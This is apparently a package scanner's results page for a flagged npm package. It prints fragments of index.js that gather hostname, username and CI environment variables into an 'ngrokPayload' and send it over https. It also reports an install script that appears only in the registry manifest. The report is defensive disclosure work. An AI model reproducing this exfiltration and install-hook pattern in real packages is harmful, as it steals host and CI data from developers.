Static Scan Results
scanned 2h ago · by rust-scannerStatic analysis flagged 7 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
One or more suspicious static signals were detected.
Decision evidence
public snapshotBehavioral surface
EnvironmentVarsFilesystemNetwork
NoLicense
Source & flagged code
3 flagged · loading sourceindex.jsView file
1const https = require('https');
L2: const fs = require('fs');
...
L7: const ngrokPayload = JSON.stringify({
L8: host: os.hostname(),
L9: user: os.userInfo().username,
L10: repo: process.env.GITHUB_REPOSITORY || 'N/A',
L11: runner: process.env.RUNNER_ENVIRONMENT || 'N/A',
...
L25: req.on('error', () => {});
L26: req.write(ngrokPayload);
L27: req.end();
High
Host Fingerprint Exfiltration
Source collects local host identity data and sends it to an external endpoint.
index.jsView on unpkg · L1binding.gypView file
•path = binding.gyp
kind = build_helper
sizeBytes = 174
magicHex = [redacted]
Medium
package.jsonView file
•scripts registry_only=install
Critical
Manifest Confusion
Tarball package.json differs from the npm registry version manifest for scripts or dependency sets.
package.jsonView on unpkgFindings
1 Critical1 High3 Medium2 Low
CriticalManifest Confusionpackage.json
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helperbinding.gyp
LowFilesystem
LowNo License